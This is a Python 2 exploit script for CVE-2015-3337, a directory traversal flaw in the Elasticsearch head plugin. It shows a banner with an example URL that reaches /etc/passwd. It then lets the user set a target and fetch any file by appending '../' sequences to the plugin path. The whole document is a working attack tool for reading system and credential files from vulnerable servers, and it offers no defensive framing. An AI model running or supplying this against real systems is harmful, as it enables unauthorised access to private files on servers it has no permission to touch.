import requests

import sys



banner='''
 _____ _   _ _____       _____  _____  __   _____       _____  _____  _____  ______
/  __ \ | | |  ___|     / __  \|  _  |/  | |  ___|     |____ ||____ ||____ ||___  /
| /  \/ | | | |__ ______`' / /'| |/' |`| | |___ \ ______   / /    / /    / /   / / 
| |   | | | |  __|______| / /  |  /| | | |     \ \______|  \ \    \ \    \ \  / /  
| \__/\ \_/ / |___      ./ /___\ |_/ /_| |_/\__/ /     .___/ /.___/ /.___/ /./ /   
 \____/\___/\____/      \_____/ \___/ \___/\____/      \____/ \____/ \____/ \_/    
                        
                        ElasticSearch File Read

            http://xx.xx.xx.xx:9200/_plugin/head/../../../../../../../../../etc/passwd
                                                                                
'''

print banner

def read_file(url,file):
    if url[-1] == '/':
        url = url[:-1]
        vuln_url = url + "/_plugin/head/../../../../../../../../.." + file
    else:
        vuln_url = url + "/_plugin/head/../../../../../../../../.." + file
    try:
        result = requests.get(vuln_url)
        if result.status_code == 200:
            print result.content
    except requests.ConnectionError,e:
        print e

th = {"url":""}

while True:
    if th.get("url") != "":
        input_file = raw_input("\nfile >>: ")
        if input_file == "exit":
            exit()
        elif input_file == 'set':
            url = raw_input("set vuln url :")
            th['url'] = url
        elif input_file == 'show url':
            print th.get("url")
        else:
            print 
            read_file(th.get("url"),input_file)
    else:
        print "\nExample : http://10.10.20.166:9200"
        url = raw_input("\nSet URL >>: ")
        th["url"] = url

if __name__ == '__main__':
    read_file(sys.argv[1], sys.argv[2])